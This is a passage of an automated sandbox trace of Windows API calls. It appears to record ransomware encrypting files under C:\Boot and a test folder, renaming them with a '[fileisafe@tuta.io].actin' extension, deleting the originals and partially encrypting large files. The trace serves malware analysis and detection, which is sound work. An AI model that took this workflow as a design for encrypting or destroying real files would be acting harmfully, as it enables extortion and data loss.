CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0056.566] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0056.566] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0056.566] WriteFile (in: hFile=0x324, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0056.566] CryptDestroyKey (hKey=0xf72180) returned 1 [0056.567] CloseHandle (hObject=0x344) returned 1 [0056.567] CloseHandle (hObject=0x324) returned 1 [0056.568] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml")) returned 1 [0056.569] SetEvent (hEvent=0x2e8) returned 1 [0056.569] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0056.569] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0056.569] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=104072) returned 1 [0056.569] CloseHandle (hObject=0x324) returned 1 [0056.569] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp")) returned 0x80 [0056.569] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0056.570] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0056.570] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0056.570] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0056.570] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0056.570] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71e80) returned 1 [0056.570] CryptSetKeyParam (hKey=0xf71e80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0056.570] ReadFile (in: hFile=0x324, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x19688, lpOverlapped=0x0) returned 1 [0056.572] CryptEncrypt (in: hKey=0xf71e80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x19690, dwBufLen=0x19690 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x19690) returned 1 [0056.572] WriteFile (in: hFile=0x344, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x19690, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x19690, lpOverlapped=0x0) returned 1 [0056.574] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71cc0) returned 1 [0056.574] CryptSetKeyParam (hKey=0xf71cc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0056.574] CryptEncrypt (in: hKey=0xf71cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0056.574] CryptDestroyKey (hKey=0xf71cc0) returned 1 [0056.574] WriteFile (in: hFile=0x344, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0056.574] CryptDestroyKey (hKey=0xf71e80) returned 1 [0056.574] CloseHandle (hObject=0x324) returned 1 [0056.574] CloseHandle (hObject=0x344) returned 1 [0056.577] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp")) returned 1 [0056.578] SetEvent (hEvent=0x2e8) returned 1 [0056.578] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0056.578] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0056.755] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=5198099) returned 1 [0056.755] CloseHandle (hObject=0x2e4) returned 1 [0056.755] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu")) returned 0x80 [0056.755] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0056.787] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0056.787] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe20 | out: lpNewFilePointer=0x0) returned 1 [0056.787] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe20 | out: lpNewFilePointer=0x0) returned 1 [0056.787] ReadFile (in: hFile=0x2e4, lpBuffer=0x3b30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x37afe2c, lpOverlapped=0x0 | out: lpBuffer=0x3b30058*, lpNumberOfBytesRead=0x37afe2c*=0x40000, lpOverlapped=0x0) returned 1 [0056.792] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x1a705b, lpNewFilePointer=0x0, dwMoveMethod=0x37afe20 | out: lpNewFilePointer=0x0) returned 1 [0056.792] ReadFile (in: hFile=0x2e4, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x37afe2c, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x37afe2c*=0x40000, lpOverlapped=0x0) returned 1 [0056.795] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x4b5113, lpNewFilePointer=0x0, dwMoveMethod=0x37afe20 | out: lpNewFilePointer=0x0) returned 1 [0056.795] ReadFile (in: hFile=0x2e4, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x37afe2c, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x37afe2c*=0x40000, lpOverlapped=0x0) returned 1 [0056.800] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe10, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe7c | out: phKey=0x37afe7c*=0xf71b00) returned 1 [0056.800] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0056.800] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe30*=0xc0080, dwBufLen=0xc0080 | out: pbData=0x3b30020*, pdwDataLen=0x37afe30*=0xc0080) returned 1 [0056.801] CryptDestroyKey (hKey=0xf71b00) returned 1 [0056.801] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe58 | out: lpNewFilePointer=0x0) returned 1 [0056.801] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xc0132, lpNumberOfBytesWritten=0x37afe68, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe68*=0xc0132, lpOverlapped=0x0) returned 1 [0056.823] SetEndOfFile (hFile=0x2e4) returned 1 [0056.823] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x4b5113, lpNewFilePointer=0x0, dwMoveMethod=0x37afe28 | out: lpNewFilePointer=0x0) returned 1 [0056.823] WriteFile (in: hFile=0x2e4, lpBuffer=0x3bf016a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x37afe34, lpOverlapped=0x0 | out: lpBuffer=0x3bf016a*, lpNumberOfBytesWritten=0x37afe34*=0x40000, lpOverlapped=0x0) returned 1 [0056.825] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x1a705b, lpNewFilePointer=0x0, dwMoveMethod=0x37afe28 | out: lpNewFilePointer=0x0) returned 1 [0056.825] WriteFile (in: hFile=0x2e4, lpBuffer=0x3bf016a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x37afe34, lpOverlapped=0x0 | out: lpBuffer=0x3bf016a*, lpNumberOfBytesWritten=0x37afe34*=0x40000, lpOverlapped=0x0) returned 1 [0056.827] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe28 | out: lpNewFilePointer=0x0) returned 1 [0056.827] WriteFile (in: hFile=0x2e4, lpBuffer=0x3bf016a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x37afe34, lpOverlapped=0x0 | out: lpBuffer=0x3bf016a*, lpNumberOfBytesWritten=0x37afe34*=0x40000, lpOverlapped=0x0) returned 1 [0056.829] CloseHandle (hObject=0x2e4) returned 1 [0057.996] SetEvent (hEvent=0x2e8) returned 1 [0057.997] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0057.997] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0057.997] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=2141433) returned 1 [0057.997] CloseHandle (hObject=0x2e4) returned 1 [0057.997] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu")) returned 0x80 [0057.997] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0057.998] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0057.998] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe20 | out: lpNewFilePointer=0x0) returned 1 [0057.998] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe20 | out: lpNewFilePointer=0x0) returned 1 [0057.998] ReadFile (in: hFile=0x2e4, lpBuffer=0x3b30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x37afe2c, lpOverlapped=0x0 | out: lpBuffer=0x3b30058*, lpNumberOfBytesRead=0x37afe2c*=0x40000, lpOverlapped=0x0) returned 1 [0058.001] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0xae453, lpNewFilePointer=0x0, dwMoveMethod=0x37afe20 | out: lpNewFilePointer=0x0) returned 1 [0058.001] ReadFile (in: hFile=0x2e4, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x37afe2c, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x37afe2c*=0x40000, lpOverlapped=0x0) returned 1 [0058.006] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x1cacf9, lpNewFilePointer=0x0, dwMoveMethod=0x37afe20 | out: lpNewFilePointer=0x0) returned 1 [0058.006] ReadFile (in: hFile=0x2e4, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x37afe2c, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x37afe2c*=0x40000, lpOverlapped=0x0) returned 1 [0058.018] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe10, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe7c | out: phKey=0x37afe7c*=0xf71a80) returned 1 [0058.018] CryptSetKeyParam (hKey=0xf71a80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0058.018] CryptEncrypt (in: hKey=0xf71a80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe30*=0xc0080, dwBufLen=0xc0080 | out: pbData=0x3b30020*, pdwDataLen=0x37afe30*=0xc0080) returned 1 [0058.019] CryptDestroyKey (hKey=0xf71a80) returned 1 [0058.019] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe58 | out: lpNewFilePointer=0x0) returned 1 [0058.020] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xc0132, lpNumberOfBytesWritten=0x37afe68, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe68*=0xc0132, lpOverlapped=0x0) returned 1 [0058.038] SetEndOfFile (hFile=0x2e4) returned 1 [0058.038] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x1cacf9, lpNewFilePointer=0x0, dwMoveMethod=0x37afe28 | out: lpNewFilePointer=0x0) returned 1 [0058.038] WriteFile (in: hFile=0x2e4, lpBuffer=0x3bf016a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x37afe34, lpOverlapped=0x0 | out: lpBuffer=0x3bf016a*, lpNumberOfBytesWritten=0x37afe34*=0x40000, lpOverlapped=0x0) returned 1 [0058.040] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0xae453, lpNewFilePointer=0x0, dwMoveMethod=0x37afe28 | out: lpNewFilePointer=0x0) returned 1 [0058.040] WriteFile (in: hFile=0x2e4, lpBuffer=0x3bf016a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x37afe34, lpOverlapped=0x0 | out: lpBuffer=0x3bf016a*, lpNumberOfBytesWritten=0x37afe34*=0x40000, lpOverlapped=0x0) returned 1 [0058.042] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe28 | out: lpNewFilePointer=0x0) returned 1 [0058.042] WriteFile (in: hFile=0x2e4, lpBuffer=0x3bf016a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x37afe34, lpOverlapped=0x0 | out: lpBuffer=0x3bf016a*, lpNumberOfBytesWritten=0x37afe34*=0x40000, lpOverlapped=0x0) returned 1 [0058.043] CloseHandle (hObject=0x2e4) returned 1 [0058.749] SetEvent (hEvent=0x2e8) returned 1 [0058.749] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0058.749] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0058.750] SetEvent (hEvent=0x2e8) returned 1 [0058.750] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0058.750] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0058.750] SetEvent (hEvent=0x2e8) returned 1 [0058.750] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0058.750] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0058.751] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=0) returned 1 [0058.751] CloseHandle (hObject=0x2e4) returned 1 [0058.751] SetEvent (hEvent=0x2e8) returned 1 [0058.752] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0058.752] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0058.752] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=0) returned 1 [0058.752] CloseHandle (hObject=0x344) returned 1 [0058.752] SetEvent (hEvent=0x2e8) returned 1 [0058.752] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0058.752] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0058.752] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=77664) returned 1 [0058.752] CloseHandle (hObject=0x344) returned 1 [0058.753] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui")) returned 0x20 [0058.753] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\bg-BG\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0058.753] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0058.753] SetEvent (hEvent=0x2e8) returned 1 [0058.753] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0058.753] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0058.755] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=95648) returned 1 [0058.755] CloseHandle (hObject=0x344) returned 1 [0058.755] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll")) returned 0x20 [0058.755] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\bootspaces.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\bootspaces.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0058.755] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0058.755] SetEvent (hEvent=0x2e8) returned 1 [0058.755] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0058.755] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0058.757] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=65536) returned 1 [0058.757] CloseHandle (hObject=0x344) returned 1 [0058.757] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 0x26 [0058.757] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\bootstat.dat.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0058.757] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0058.757] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0058.757] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0058.757] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\bootstat.dat.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0058.758] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72140) returned 1 [0058.758] CryptSetKeyParam (hKey=0xf72140, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0058.758] ReadFile (in: hFile=0x344, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x10000, lpOverlapped=0x0) returned 1 [0058.759] CryptEncrypt (in: hKey=0xf72140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x10010, dwBufLen=0x10010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x10010) returned 1 [0058.759] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x10010, lpOverlapped=0x0) returned 1 [0058.761] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71d40) returned 1 [0058.761] CryptSetKeyParam (hKey=0xf71d40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0058.761] CryptEncrypt (in: hKey=0xf71d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0058.761] CryptDestroyKey (hKey=0xf71d40) returned 1 [0058.761] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0058.762] CryptDestroyKey (hKey=0xf72140) returned 1 [0058.762] CloseHandle (hObject=0x344) returned 1 [0058.762] CloseHandle (hObject=0x2e4) returned 1 [0058.763] DeleteFileW (lpFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 1 [0058.765] SetEvent (hEvent=0x2e8) returned 1 [0058.765] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0058.765] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0058.765] GetFileSizeEx (in: hFile=0x2e4, 